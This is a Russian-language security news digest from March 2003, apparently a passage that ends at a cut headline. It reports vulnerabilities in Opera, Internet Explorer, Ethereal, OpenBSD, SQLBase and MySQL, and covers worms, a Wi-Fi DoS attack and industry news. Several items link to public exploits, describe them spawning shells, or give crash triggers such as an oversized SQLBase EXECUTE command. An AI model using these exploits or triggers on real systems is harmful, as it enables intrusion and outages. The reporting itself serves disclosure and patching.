Господин nesumin из Японии сообщает об обнаружении уязвимости в популярном норвежском броузере Opera. Связана она с тем, что Опера при загрузке файла не производит проверку длины его имени. Если файл будет иметь очень длинное имени, то при показе диалога загрузки ("Download Dialog") произойдёт переполнение буфера на стеке. При этом может быть перезаписан адрес возврата в стеке (RET), что даёт возможность выполнения произвольного кода в системе. Проверка производилась на платформах Windows - 98SE, 2000 Pro, XP Home SP1. Уязвимыми оказались версии Opera - 7.02 build 2668, 7.02 bork build 2656b, 7.01 build 2651, 6.05 build 1140 английской и японской версии. Выпущены 2 эксплоита - один на Перл (dlfnbof.pl), второй на С - gpa.с. Источник - http://www.securityfocus.com
13/03/2003 14:33 DoS-атака в беспроводных 802.11b сетях.
Mark Osborne из Великобритании сообщает о новом виде DoS-атаки на беспроводные 802.11b сети. Название её FATA-jack. Является модифицированной версией ранее выпущенной Wlan-jack. Суть атаки сводится к посылке пакетов Authentication-Failed с кодом причины, который обозначает, что предыдущая аутентификация некорректна. Пакеты посылаются к PC-клиенту беспроводной сети. MAC-адреса источника и адресата сообщения подменяются, так что создаётся имитация выдачи пакета от имени "точки доступа" (Acces point). В применявшихся тестах атака была успешно осуществлена на такие ОС, как Windows98, Windows ME и Linux. При этом при помощи FATA-jack были успешно сброшены активные сетевые сессии, в некоторых случаях вызывая сбой клиентских драйверов и ПО - при этом для возобновления функционирования требовалась перезагрузка. Подробности - http://www.security.nnov.ru/search/document.asp?docid=4192
13/03/2003 13:02 Семинар Softline "Oracle Technology Day".
Компании SoftLine и Oracle приглашают Вас 17 марта 2003г. принять участие в БЕСПЛАТНОМ семинаре "Oracle Technology Day". На этом семинаре участники смогут узнать как об основных базовых возможностях и характеристиках СУБД Oracle, так и о новых возможностях, реализованных в последней (финальной для 9i) версии - СУБД Oracle 9.2. Использование этих возможностей позволяет упростить и ускорить разработку и развитие приложений и, как результат, улучшить работу Ваших организаций. Также будет рассмотрена архитектура и функции компоненты Oracle IFS - Internet File System. Начало регистрации в 9.30. Место проведения: Адрес: Москва, Саввинская наб., 15, офис компании Oracle. Регистрация - http://www.softline.ru/seminar.asp?...
13/03/2003 12:31 Cтатья "Криптографические файловые системы: дизайн и реализации".
Hal Flynn из Symantec Corp. объявил о доступности на сайте securityfocus новой статьи Ido Dubrawsky посвящённой обзору файловых систем с встроенными средствами криптографии. Рассказано об основных возможностях и особенностях современных криптонрафических файловых систем. В качестве конкретных реализаций рассмотрены: Encrypting File System от Microsoft (Win2K), CryptoAPI из Linux и Secure File System. Статья - http://www.securityfocus.com/infocus/1673
13/03/2003 12:09 Удаленное выполнение произвольного кода в Microsoft Internet Explorer.
Переполнение буфера обнаружено в браузере Microsoft Internet Explorer в процессе обработки некорректных ‘.mht' архивных Web страниц. Удаленный пользователь может выполнить произвольный код на целевой системе пользователя. Canon System Solutions сообщил, что удаленный пользователь может внедрить выполнимое содержание в Web архив и, используя уродливый MIME заголовок, выполнить это содержание, когда архив загружен в браузере целевого пользователя. Код выполнится с привилегиями целевого пользователя. Если структура MIME заголовка и сопроводительный Base64-encoded текст обработаны должным образом, могут быть перезаписаны 4 байта памяти. Уязвимость обнаружена в Microsoft Internet Explorer 5.5 – 6.0. Подробнее - http://www.securitylab.ru/?ID=36445
13/03/2003 11:35 Red Hat выпускает дешевую версию Linux.
В среду дистрибьютор Linux Red Hat приступил к реализации нового этапа своего плана извлечения прибыли из успешного продукта. Компания выпустила новую, дешевую версию ПО Advanced Server вместе с новой торговой маркой. Red Hat переименовала продукт Advanced Server в Red Hat Enterprise Linux AS и представила версию Enterprise Linux ES для маломощных серверов с одним-двумя процессорами. Компания все более агрессивно реализует свои планы по выпуску high-end ПО Advanced Server, но ей так и не удалось добиться заметного успеха в привлечении заказчиков к плану подписки за 1500-2500 $ в год на версию Linux для маломощных серверов. Новый продукт Enterprise Linux ES в зависимости от уровня поддержки стоит 349 $ или 800 $ в год. «Нам нужна версия корпоративной платформы начального уровня, — пояснил вице-президент Red Hat по маркетингу Марк Девиссер (Mark De Visser). — Advanced Server бьет слишком высоко». Семейство Enterprise Linux включает также версию WS для рабочих станций с одним или двумя процессорами. Она стоит 179 $ или 299 $ в год за базовый или стандартный план подписки соответственно. Источник - http://zdnet.com.com/2100-1104-992155.html
13/03/2003 11:04 Госдума ужесточила наказание за пиратство.
Государственная дума с редким единодушием (392 голоса "за", 1 "против") приняла в третьем чтении закон "О внесении изменений в статью 146 Уголовного кодекса Российской Федерации", ужесточающий ответственность за нарушение авторских прав. Главный камень преткновения при создании эффективного антипиратского закона - исчисление стоимости ущерба. Понятие "ущерб правообладателя" должно, по идее, определяться розничной ценой программного обеспечения или записи фильма, а не стоимостью болванки диска. Российская практика, однако, исходит из обратного. Внешне проект нового закона суров. Крупный ущерб правообладателю наказывается "штрафом от 200 до 400 минимальных зарплат либо в размере заработной платы или иного дохода осужденного за период от 2 до 4 месяцев". Пираты-рецидивисты рискуют лишением свободы на срок от 2 до 5 лет с конфискацией или без конфискации имущества. Но даже если закон будет принят в Совете Федерации, ситуация имеет все шансы остаться без фактических изменений. Это в лучшем случае. Основная причина та же - методика определения стоимости ущерба. Подробнее - http://www.cnews.ru/newsline/index.shtml?2003/03/12/141855
13/03/2003 10:40 Иранские власти арестовали 68 пользователей интернета.
Иранская полиция нравов арестовала 68 молодых мужчин и женщин - клиентов интернет-службы знакомств, сообщает газета "Известия". Всех арестованных обвинили в том, что они собирались назначать друг другу свидания и вступить в "запрещенную связь". Кроме них, власти арестовали операторов сайта. Как отмечает газета, за последнее время в Иране были закрыты несколько провайдеров, предоставивший хостинг сайтам, содержание которых не устраивало правительство. Высший совет создал специальную госкомиссию, которой поручено составить список "противозаконных" сайтов и представить его в министерство связи. Однако прежде всего, иранское правительство борется не с сетевыми "своднями", а с журналистами, которые публикуют в интернете материалы, критикующие правящий режим. Недавно несколько из них были арестованы, а новостной сайт alliran.net - закрыт. Подробности - http://izvestia.ru/world/article31093
13/03/2003 10:32 RMAP 15e
После длинной паузы вышла обновленная версия патча для использования реверсивного маппинга памяти ядра 2.4. Об этом сегодня в рассылке LKML сообщил разработчик патча Rik van Riel, так же как и своем переходе из Connectiva Linux в Red Hat. Страница патча - http://surriel.com/patches/
12/03/2003 13:42 Уязвимости в Ethereal.
Известный исследоатель компьютерной безопасности Георгий Гунински обнаружил уязвимости в популярном в мире открытых систем сниффере Ethereal. Удаленный пользователь может аварийно завершить работу сниффера или выполнить произвольный код. Уязвимость формата строки в обнаружена в функции proto_tree_add_text() файла packet-socks.c. Данные, переданные пользователем к format_text() не проверяются на наличие определений границ формата. Также удаленный пользователь может создать специально обработанный SOCKS-пакет и послать его через сеть, в которой работает Ethereal, чтобы завершить процесс или выполнить произвольный код. Эксплоит также опубликован. Уязвимость обнаружена в Ethereal 0.8.7 - 0.9.9 Подробности - http://www.guninski.com/etherre.html
12/03/2003 11:25 Выпущен "Антивирус Касперского® Lite 4.5".
"Лаборатория Касперского" сообщает о выпуске и начале продаж новой версии Антивируса Касперского® Lite 4.5, созданной специально для защиты домашних компьютеров начинающих пользователей. По сравнению с предшественниками, Антивирус Касперского Lite 4.5 включает в себя ряд значительных внутренних архитектурных и внешних изменений, существенно расширяющих функциональность программы и упрощающих работу с ней. Для максимального упрощения работы с Антивирусом Касперского пользователю предлагается 3 предустановленных уровня проверки: быстрый (проверка только основных компонентов компьютера), средний (оптимальный уровень с точки зрения временных затрат и глубины проверки) и высокий (полная проверка компьютера). Помимо модернизации внешнего вида новая версия Антивируса Касперского Lite включает ряд технологических изменений. Подробности - http://www.kaspersky.ru/news.html?id=1222661
12/03/2003 10:41 Американским солдатам в Ираке запретят писать электронные письма домой.
Пентагон собирается запретить пользование электронной почтой и другими протоколами интернет-связи в некоторых подразделениях, дислоцированных в районе Персидского залива. В настоящее время военнослужащие могут связаться со своими родственниками прямо из расположения своих частей, с кораблей и даже подводных лодок и блокпостов в пустыне. Причем, если на подлодках начальство может контролировать практически весь поток информации, то в сухопутных и военно-воздушных частях это почти невозможно. По данным Пентагона, некоторые солдаты отправляли домой письма, содержащие не только секретную информацию, но даже и цифровые фотоснимки позиций и вооружения. Эксперты выделили несколько проблем, связанных с доступом в сеть в боевых частях. В первую очередь, Интернет опасен тем, что объемы информации весьма велики и их тяжело отслеживать. Во-вторых, по сети можно передавать не только слова, но и изображения. В-третьих, сведения, которые попадают в Интернет, могут быть самыми свежими, вплоть до вещания в реальном времени. В этом случае, противник может оперативно узнавать о планах и действиях частей, их расположении, либо присутствии в них определенных командиров. Подробности - http://www.iht.com/articles/89467.html
12/03/2003 10:19 Microsoft обещает покончить с "адом DLL".
Microsoft обещает, что Windows Server 2003 положит конец одной из худших головных болей пользователей и администраторов Windows. Речь идет о проблеме библиотек Dynamic Link Libraries – программных модулей, которыми могут пользоваться разные приложения: с годами эта проблема только усугублялась. Обычно неприятности возникают после установки программы, работающей с обновленной версией библиотеки DLL, которая уже используется другим приложением. Если первое приложение оказывается несовместимым с модернизированной библиотекой, то пользователь получает сообщение об ошибке; Windows и приложения для Windows не отслеживают номеров версий DLL, поэтому установить причину проблемы бывает трудно. Исторически обобщенные компоненты понадобились из-за дороговизны пространства памяти на диске и оперативной памяти. Но по мере увеличения размеров приложений и числа модулей (еще не так давно программы целиком умещались в единственном файле .exe) проблема общих библиотек DLL, которую прозвали «адом DLL», не только осталась, но и усугубилась. Теперь Microsoft надеется покончить с ней, встроив в Windows Server 2003 систему, предотвращающую удаление старых DLL при установке новыми приложениями усовершенствованных версий тех же DLL, так что существующие приложения смогут по-прежнему ими пользоваться. Подробности - http://zdnet.com.com/2100-1104-991369.html
11/03/2003 23:57 На сайте новый документ: Фальсификация cookie.
Это наиболее полное описание проблем связанных с cookie. В данном документе рассмотрены темы фальсификации cookie и чтение cookie других пользователей. Описаны методы Cross Site Scripting и Cross Site Traceing, а также уязвимости приложнний технологии .NET. Ознакомиться: http://www.uinc.ru/articles/40/index.shtml
11/03/2003 18:13 Владимир Путин упразднил ФАПСИ.
Сегодня Президент Российской Федерации Владимир Путин подписал несколько указов о реорганизации органов силового блока. По решению главы государства, функции ФАПСИ перераспределятся между ФСБ и министерством обороны России. Кроме того, при министерстве обороны создается Госкомитет по государственному оборонному заказу, руководителем которого назначен бывший директор ФАПСИ Владимир Матюхин.В задачи ФАПСИ входило обеспечение функционирования, развития и обеспечения информационной безопасности технологической основы системы управления государством в мирное и военное время, а также противодействие, в пределах своей компетенции, угрозам безопасности России в информационной сфере. Именно специалисты этой организации проводили сертификацию криптографических систем, а также предоставляли лицензии на проектирование и производство систем защиты информации. По всей вероятности, именно эти функции теперь перейдут в ведение ФСБ. Источник - http://www.compulenta.ru
11/03/2003 17:51 Linux kernel станет более дружелюбен
Как сообщается на slashzone.ru, команда разработки ядра Linux снова взялась за работу. Линус Торвальдс предложил новый патч, который существенно ускоряет работу интерактивных процессов, что благотворно сказалось на X-десктопе, а также аудио- и видеоплейерах. Автор планировщика O(1) Инго Молнар подсоединил патч к собственным разработкам и получил восхитительные результаты. Готовящийся к выходу kernel 2.6, похоже, станет осуществлением пользовательской мечты о хорошем десктопе. Обсуждение - http://kerneltrap.org/node.php?id=603
11/03/2003 15:19 Ещё раз про уязвимости в трубках Siemens.
По информации, полученной от администратора узла сети Нарзан-МинВоды Виталия Лопатина эти уязвимости довольно подробно обсуждались на форуме siemens-club.ru. Так что всем заинтересованным рекомендуем посетить этот форум по ссылке, приведённой ниже. Обсуждение - http://forum.siemens-club.ru/viewtopic.php?TopicID=10879
11/03/2003 10:13 Обзор сканеров уязвимости.
На сервере InfoSecurity Magazine опубликован обзор, принадлежащий перу Джоела Снайдера, пяти наиболее популярных сканеров уязвимости на предмет обнаружения дыр. В частности, тестированию были подвергнуты: Internet Scanner (ISS), Retina (eEye), NetRecon (Symantec), SAINT (SAINT), Nessus и NessusWX. Применялись различные методы тестирования - проверка определения стандартных уязвимостей, проверка уязвимости конфигурации файрволла, удобство прочтения сгенерированного отчёта и т.д. Вывод, сделанный автором - ни один из сканеров не показал себя лучшим во всех тестах. Почти каждый из них может применяться для общей проверки уязвимости сервера и защищаемой сети. Однако, как утверждается, ни один из проверяемых сканеров не удовлетворяет требованиям каждодневного экстренного реагирования на вновь появляющиеся уязвимости. В наиболее лучшую сторону отмечены коммерческий ISS's Internet Scanner и свободный Nessus/NessusWX. Обзор - http://www.infosecuritymag.com/2003/mar/cover.shtml
11/03/2003 10:01 Зарегистрированы первые случаи заражения червем ‘Deloder’ .
Panda Software сообщает о первых сообщениях об обнаружении червя Deloder (W32/Deloder.A). Созданный в Китае червь Deloder заражает компьютеры, работающие под управлением операционных систем Windows 2000 и XP. Для распространения данный вредоносный код ищет в сети Интернет компьютеры, с которыми он может соединиться через порт 445. При успешной установке соединения червь копирует в папку Windows файл INST.EXE. Этот файл является троянцем, предназначенным для получения удаленного доступа к компьютеру. После этого Deloder создает свою копию на зараженном компьютере в файле DVLDR32.EXE. Кроме того, Deloder пытается обнаружить имена пользователей, подключенных к той же сети, что и зараженный компьютер. Найдя их, червь пытается получить доступ к компьютерам путем подбора пароля к системе из списка наиболее часто используемых слов и выражений. Наконец, Deloder отключает общие сетевые ресурсы и вносит некоторые записи в системный реестр Windows для обеспечения постоянной работы на зараженном компьютере. Действия, выполняемые Deloder, могут привести к нарушению нормального функционирования зараженной сети. Источник - http://www.viruslab.ru
11/03/2003 09:37 Уязвимость файловой системы в Solaris 9.
Как сообщается в бюллетене по безопасности Alert 51300, файловая система UFS OC Solaris 9 обладаете уязвимостью, позволяющей локальному пользователю полностью завесить систему. Подобная уязвимость существует на UFS с выставленной опцией регистрации (logging). Версии 2.6, 7 и 8 уязвимостью не обладают. Для определения того, смонтирована ли UFS с опцией logging рекомендуется посмотреть /etc/vfstab. Выпущен соответствующий патч 113454-04. В качестве временной меры предотвращения рекомендуется отключить опцию регистрации в /etc/vfstab, либо выполнить команду: mount -o remount,nologging . Подробности - http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F51300
11/03/2003 08:28 Программист из Одессы нажаловался в Microsoft на сайт Neowin.
Неофициальный сайт Neowin.net, посвященный операционный системе Windows и ее обновлениям и недостаткам, некоторое время назад был закрыт по требованию руководства компании Microsoft. Как сообщает lenta.ru, недовольство Microsoft было вызвано статьей, посвященной изъяну в Windows XP Peer to Peer SDK. Проживающий в Одессе сотрудник компании TAG Software Research Lab Андрей Терещенко (мы упоминали об Андрее во вчерашних новостях) с помощью поисковой системы Google обнаружил любопытную статью на сайте Neowin. В материале сообщалось, что для получения паспорта Microsoft, активно используемого владельцами сайтов электронной коммерции, достаточно воспользоваться образцом идентификационного номера для ознакомления с бета-версиями программ Microsoft. Терещенко не только упомянул о найденной им на Neowin статье, но и порекомендовал Microsoft проверить законно ли используют свои идентификационные данные владельцы сайта. Кроме того программист из Одессы сообщил Microsoft адреса владельцев хостинга "опального" сайта". Получив письмо Терещенко, представители Microsoft обратились к владельцу хостинга, на котором расположен Neowin.net и не просто удалили опасные для компании сведения сообщение, а закрыли весь сайт. Однако, сам Андрей пишет следующее: "Lenta.ru имеет значительные ошибки перевода оригинальной статьи коренным образом искажающие факты. Я сообщал Microsoft не о Windows XP Peer to Peer SDK, и не находил его в Google.com. Суть моего конфликта с NeoWin в нарушении авторских прав, распространение непроверенной информации и нарушение условий ее получения. Lenta.ru была проинформированна об ошибке перевода". Подробности - http://www.tag.odessa.ua/neowin/russian.html
11/03/2003 07:25 Microsoft выпустила вторую тест-версию Office 2003.
Корпорация Microsoft выпустила вторую тестовую версию своего нового пакета программ Office 2003, сообщает Reuters. Руководство компании ожидает, что новая тест-версия, занимающая 12 CD-дисков и распространяющаяся бесплатно, будет опробована более 500 000 пользователями. Выпуск новой версии Office, назначенный на лето, должен стать для Microsoft самым значительным событием со времен начала продаж операционной системы Windows XP в 2001 году. По официальной терминологии компании, новый продукт - это не "пакет" офисных программ (как предыдущие версии Office), но "система", в которую, дополнительно к стандартному комплекту из Word, Excel, PowerPoint и Outlook добавлено большое количество новых компонентов. Привычные для пользователей программы также подверглись изменениям. Так, Microsoft Outlook обзавелась фильтром для отсеивания спама. Помимо этого, готовится к выпуску и расширенная версия программы, Outlook with Business Contact Manager. Новая особенность пакета - система распознавания и сбора информации из Сети и различных баз данных, использующая язык XML. Подробности - http://lenta.ru/internet/2003/03/11/office/
11/03/2003 03:18 Новая версия PE Tools: 1.4.380.2003
Что нового: - Исправлено несколько мелких багов - Dump Region не работал в WinXP, теперь работает :) + В PE Sniffer добавлено более 15 новых сигнатур + В "Dump Region..." добавлена кнопка "Refresh" + В "PE Rebuilder" добавлено Bind Imports + Добавлена возможность обновления списка процессов/модулей по нажатию F5 + Добавлено сравнение секций (было только сравнение PE заголовка) + Добавлен Time/Date Stamp Converter (GMT). + Добавлено несколько дополнительных настроек: [ PE Editor ] - Create backup copy (BAK-File) - Read only - Section Table: autofix SizeOfImage - Optional Header: autofix Checksum - Optional Header: autofix SizeOfHeaders [ PE Rebuilder ] - Bind Imports [ Break & Enter ] - Register Shell Extension [ Task Viewer ] - Agreement required for terminations - Delete temp files + Добавлена возможность загрузки дампа процесса в PE Editor + Добавлена возможность загрузки дампа процесса в PE PE Sniffer Скачать новую версию можно здесь: http://www.uinc.ru/scripts/load.cgi?files/neox/PE_Tools.zip
10/03/2003 14:35 Эксплоит утилиты file.
Господин CrZ из LimpidByte [lbyte.void.ru] опубликовал эксплоит, использующий уязвимость, обнруженную iDEFENCE в утилите file (мы писали об этом ранее). В результате выполнения программы создаётся file-exploit, и после выполнения команды file /path/to/this/file-exploit порождается шелл на 2003 порту. Эксплоит - http://packetstorm.linuxsecurity.com/0303-exploits/85deadelf.c
10/03/2003 14:15 Работоспособность RIPE восстановлена.
Как сообщает TheRegUK, работоспособность RIPE (Réseaux IP Européens) была полностью восстановлена. RIPE является крупнейшим европейским информаицонным ресурсом, отвечающим за распределение блоков IP-адресов в европейском сегменте Интернет. Выход из строя DNS, WHOIS и FTP-сервисов был обусловлен крупнейшей хакерской атакой, которая была проведена в промежутке 14:00 - 16:30 GMT 27 февраля. Также не был работоспособен Web-сервис RIPE. Атака носила характер распределённой атаки (DDoS), носящая характер заполнения (зафлуживания) "левыми" ICMP-запросами. 6 марта все сервисы были восстановлены и функционируют по полной программе. По информации сетевого координационного центра RIPE (NCC), выход из строя сервисов в результате проведённой атаки был выведен из строя BGP (Border Gateway Protocol) - важнейший протокол машрутизации и все запросы, кроме ICMP, просто сбрасывались. Об источнике атаки пока ничего не сообщается. Подробности - http://www.theregister.co.uk/content/6/29623.html
10/03/2003 13:09 Переполнение буфера в lprm утилите в OpenBSD.
Переполнение буфера обнаружено в lprm утилите для OpenBSD. Локальный пользователь может выполнить произвольный код с более высокими привилегиями. Согласно сообщению, проверка границ, которая добавлена к программе в 1996 году, неэффективна. Локальный пользователь может заставить программу выполнить произвольный код с привилегиями lprm процесса. В OpenBSD 3.1 и более ранних версиях lprm выполняется с user id (setuid) root-привилегиями. В OpenBSD 3.2, утилита lprm выполняется с setuid daemon привилегиями. Уязвимость обнаружена в OpenBSD 3.2, 3.1 и более ранних версиях Подробности - http://www.securitylab.ru/?ID=36346
10/03/2003 12:51 Возможность раскрытия списка пользователей в WinXP и не только.
На днях в BUGTRAQ прошло довольно любопытное послание от Eitan Caspi из Израиля. В ней автор описывает технологию определения пользователей, принадлижащих к группе "Administrator". Для получения этого списка при помощи экрана авторизации, называемого "Welcome Screen", необходимо загрузиться в безопасный режим ("Safe Mode") - при этом выводится только список пользователей, принадлежащих к группе Администарторов. Собственно говоря, само по себе это не является уязвимостью, однако может несколько облегчить работу по подбору паролей (сужается круг пользователей). Также необходимо заметить, что подобный экран можно выводить, если машина является частью сетевой модели "Рабочая группа" и недоступна, если машина является частью домена или инфраструктуры Active Directory. В качестве меры предосторожности автор рекомендует использовать обычный экран авторизации. В ответ на это послание пришло письмо от Андрея Терещенко из TAG Software Research Lab, Одесса, Украина, в котором он заметил, что подобная "особенность" "Welcome Screen" известна довольно давно, равно как и известны способы борьбы с ней. Также Андрей заметил, что можно получить список всех пользователей и расшаренных ресурсов Win2K, WinNT4 при установке по умолчанию через т.н. "нуль-сессию". В WinXP эта "особенность" также была изменена. По приведённым ниже ссылкам при ведены дискуссии по этим вопросам. Ссылка 1 - http://www.kellys-korner-xp.com/xp_wel_screen.htm Ссылка 2 - http://cert.uni-stuttgart.de/archive/focus-ms/2002/03/msg00088.html
10/03/2003 11:42 Возможность переполнения буфера в SQLBase.
Network Intelligence India Pvt. Ltd. (NII) cообщает о возможности переполнения буфера в SQLBase. Для проведения атаки достаточно выполнить команду EXECUTE SYS.AAAAAAAAAAAA...... (700 cимволов). Для выполнения команды. естественно, необходимо иметь минимальные привилегии на уровне CONNECT. В результате SQLBase RDBMS "свалится" с привилегиями Local System в Windows-системах. Собственно, эта уязвимость была обнаружена NII раньше, но теперь её описание дополнилось советом по избежанию возможности проведения атаки и ответом производителя (Gupta Worldwide). Подробности - http://www.nii.co.in/vuln/sqlbase.html
10/03/2003 10:05 Уязвимость в MySQL.
Gufino из Италии сообщает о возможности повышения полномочий в MySQL 3.23.53. Подменив файл datadir/my.cnf с помощью операции SELECT INTO можно заставить mySQL запускаться от любого пользователя, включая root. Подробности - http://www.security.nnov.ru/search/document.asp?docid=4176
10/03/2003 09:01 Уточнение к уязвимости в трубках Siemens.
Ранее мы сообщали об уязвимости, обнаруженной группой dwcgr0up, в некоторых моделях сотовых телефонов Siemens, сводящейся к блокировке некоторых моделей при посылке определённых SMS-сообщений. В результате в списке рассылки BUGTRAQ Развернулась довольно бурная дискуссия об уязвимости определённых моделей и возможностях разблокировк. Вчера некий Tim Kornau сообщил, что существует возможность разблокировки тркубок без обновления ПО. Для этого достаточно использовать инструмент GSM Utils for Linux, позволяющий безопасно читать и удалять SMS-сообщения телефона. Источник - http://www.securityfocus.com
9/03/2003 13:04 Новое ПО-толмач расшифрует «Эшелону» арабских террористов.
Атака на Нью-Йорк 11 сентября 2001 г. заставила американские спецслужбы внимательнее относиться к текстам и сообщениям на арабских языках. Компания Basis Technology выпускает ПО для обработки текстов (и дальнейшего использования в сфере “data mining») на всех языках мира. Её программы распознают и анализируют языки, проверяют алфавиты на совместимость с Unicode и проводят многоязыковой поиск в документе. Арабский язык - один из самых трудных для компьютерного анализа, особенно по части поиска данных. Зачастую арабские слова уже несут в себе грамматические элементы, определяющие вид глагола, спряжение, лицо, число, род и др. В итоге, текст на арабском приходится "нормализовать", чтобы обеспечить индексирование, поиск по ключевым словам и другие операции. К тому же, своеобразное использование или полное отсутствие гласных вносит дополнительные трудности. По сообщению Basic Technology, Arabic Language Analyzer (ARLA) представляет собой программный механизм, позволяющий обрабатывать документы, написанные на арабском языке. ARLA легко интегрируется с существующими системами поиска. ARLA выполняет орфографическую и лексическую нормализацию текста, включающую удаление таких частей речи, как союзы, предлоги и местоимения, которые усложняют поиск. В программе используются сложный лингвистический алгоритм и специальная лексика для перевода числительных, (включая сложные) в формы единственного числа. Созданный по заказу спецслужб Arabic Language Analyzer расширит возможности американских "органов" в предотвращении возможных террористических атак. Источник - http://www.oxpaha.ru
9/03/2003 12:48 Через AOL проходит миллиард спам-писем в день.
Как сообщает slashzone.ru, корпорация AOL заявила, что в среду число писем, остановленных за последние 24 часа её спам-фильтрами, превысило миллиард. В среднем фильтры защищают каждого подписчика AOL от 28 писем со спамом в день. Кроме того, инженеры AOL заявили, что каждый день они получают от пользователей 5 с половиной миллионов писем с сообщениями о спаме. Подробности - http://www.businesswire.com/cgi-bin/f_headline.cgi?day0/230645356&ticker=aol
9/03/2003 12:12 Документация qmail-HOWTO 1.3.
Вышла версия 1.3 документации, посвящённой настройке довольно неплохого MTA qmail. Представляет собой альтернативу (наряду с Exim) популярному MTA sendmail. Ссылка - http://www.slackwarelinux.net/documents/qmail-HOWTO
9/03/2003 12:04 Создание web-приложений на языке PERL.
На сайте opennet.ru приведена ссылка на ускоренный учебный курс представляющий собой своего рода выжимку из многих электронных и бумажных изданий. В рамках этого курса Perl рассматривается только как язык написания CGI-сценариев. Рекомендуется разработчикам приложений на Perl. Ccылка - http://pgbook.dax.ru/perl/index.htm
9/03/2003 11:41 Выход Qt 3.1.2.
Вышла новая версия библиотеки разработчика для открытых систем Qt 3.1.2. Изменения незначительные - исправлены некоторые ошибки некорректного отображения курсоров. Подробности - http://www.trolltech.com/developer/changes/3.1.2.html
9/03/2003 11:08 Техасский хакер украл университетскую базу данных социального страхования.
Неизвестный хакер сумел проникнуть на сервер Техасского университета, расположенный в городе Остин, и похитил данные социального страхования более чем 55 200 человек, сообщает сайт pressetext.de. В число людей, чьи персональные сведения оказались в руках компьютерного взломщика, попали бывшие и настоящие студенты университета, а также абитуриенты и преподаватели. Хакеру стали известны имена, телефоны, электронные адреса и номера социального страхования лиц, занесенных в университетскую базу данных. Факт взлома базы данных был обнаружен в прошлое воскресенье вечером, однако первые сообщения об этом преступлении появились лишь в четверг. Для того, чтобы проникнуть на сервер, хранящий номера социального страхования, преступник использовал более миллиона случайных комбинаций цифр. По-видимому, одна из таких комбинаций, имитировавших номера социального страхования совпала с именем студента, хранящимся на незащищенном сервере с результатами университетских экзаменов. Такое совпадение и позволило хакеру проникнуть в базу данных. По данным правоохранительных органов, по состоянию на вечер пятницы, хакер вряд ли сумел передать кому-либо похищенные им данные. Для розыска преступника привлечено значительное количество полицейских и даже агентов Секретной службы, которые проводят поиски хакера в Остине и Хьюстоне. Для получения и распространения оперативной информации по фатку похищения базы данных социального страхования руководство университета открыло специальный сайт, адрес электронной почты и круглосуточную телефонную линию. Источник - http://www.lenta.ru
9/03/2003 10:33 J2SDK 1.4.1p3 для FreeBSD.
Как сообщает на linux.org.ru KAN, FreeBSD Java Porting Team выпустил третий патч для JDK 1.4.1 на FreeBSD. Длительному отставанию FreeBSD как Java платформы похоже приходит конец. Отдельное спасибо за проделанную работу выражают лично Алексею Зелкину, которому Java на FreeBSD обязана своим сушествованием как никому другому, и FreeBSD Foundation, сделавшей эту работу возможной. Подробности - http://docs.FreeBSD.org/cgi/getmsg.cgi?fetch=792718+0+current/cvs-ports
9/03/2003 10:24 Cтатья "Вы заражены? Обнаружение зловредного программного обеспечения".
На сайте securitylab.ru опубликован очередной перевод Михила Разумова. Вот, что пишется во вступлении: "Когда пользователи подозревают, что проблемы в системе вызваны злонамеренным программным обеспечением (malware), в 9 случаях из 10 они ошибаются. Существует множество причин для сбоев в системе. Однако, всегда предполагается, что сбой вызван каким-то внешним воздействием на систему, чем-то, что имеет намерение прервать нормальную работу системы, чем-то, имеющим отношение к вирусам, или malware. Однако, в большинстве случаев к сбоям системы malware не имеет никакого отношения". Оригинал статьи "Are You Infected? Detecting Malware Infection" Jong Purisima из Trend Micro Inc. был опубликован на сайте securityfocus.com Cтатья - http://www.securitylab.ru/?ID=36332
8/03/2003 16:10 Откажитесь от BIND - переходите на DJBDNS
Именно под таким заголовком вышла статья Брайана Хэтча (Brian Hatch) из Onsight, Inc., хозяина сайтов "Hacking Linux Exposed" и "Building Linux VPNs". Как мы писали раньше, вышла очередная новая версия BIND (выпускается ISC - Internet Software Consortium), в которой устранены очередные уязвимости - 9.2.2. Ранее также по сайтам безопасности проходила информация о периодическом появлении очень серьёзных уязвимостей в BIND. Так как безопасность DNS-cерверов является наиважнейшей в работе Интернет, для администраторов очень важно, чтобы DNS функционировал правильно. Брайан предлагает в качестве альтернативы BIND использовать DJBDNS, ПО DNS-серверов, написанное Dan Bernstein. За всё время существование этого ПО в нём не было обнаружено ни одной уязвимости. Статья Брайана описывает как правильно инсталлировать DJBDNS, а также вопросам кофигурирования и настройки. Пока опубликована только первая часть проекта, в которой описывается, как инсталлировать Daemontools. О процессе инсталляции самого DJBDNS планируется рассказать на следующей неделе. Статья - http://www.hackinglinuxexposed.com/articles/20020716.html
8/03/2003 14:58 CGI-эксплоит генератор.
Вашему вниманию предлагается генератор, использующий CGI-эксплоиты. Он позволяет использовать уязвимости, обнаруженные в CGI-скриптах без использования Вэб-броузеров. При появлении новой уязвимости достаточно изменить некоторые строки в исходнике и перекомпилировать его под новую уязвимость. При выполнении программы на Вэб-сервере выполняется ваша команда, выход которой поступает на Ваш stdout. Тестировалась на платформе FreeBSD 4.6. Исходник - http://packetstorm.linuxsecurity.com/web/genraid3r.c
8/03/2003 14:18 BeOS: возрождение.
По сообщению всё того же сайта slashzone.ru, на предстоящей выставке CeBIT малоизвестная компания Yellowtab собирается представить новую версию некогда достаточно популярной операционной системы BeOS. Zeta, а именно так теперь будет называться новая ОС, выйдет сразу в трех вариантах - Home Edition, Developer Edition и Deluxe Edition. Первый пакет - Home Edition рассчитан на рядового пользователя и включает в себя стандартные утилиты по просмотру графических или видеофайлов, аудиопроигрыватель, приложение для работы с CD-RW дисками и пакет офисных программ Gobe Productive, совместимый с форматами Microsoft Word и Excel. Как сообщается на сайте разработчика, в операционную систему встроена поддержка шестидесяти форматов видеофайлов и около трехсот шестидесяти форматов графических файлов. Кроме того, производитель реализовал в Zeta и встроенную поддержку десяти самых распространенных языков - французского, английского, немецкого, итальянского, русского и так далее. Вторая версия Zeta - Developer Edition отличается наличием встроенных средств для разработчиков программного обеспечения: это - PHP, Perl, Python, Basic, Assembler, Pascal и C/C++ и некоторые другие. И, наконец, Deluxe Edition будет поставляться с 3 ГБ DVD-диском, на котором будет записано несколько сотен самых разнообразных приложений – от игр до пакетов по обработке графики. Ориентировочная стоимость Zeta составит сорок долларов – для Home Edition, шестьдесят долларов – для Developer Edition и сто долларов – для Deluxe Edition. Сайт проекта - http://www.yellowtab.com/products/
8/03/2003 13:41 Серьезная дыра в Macromedia Flash Player 6.
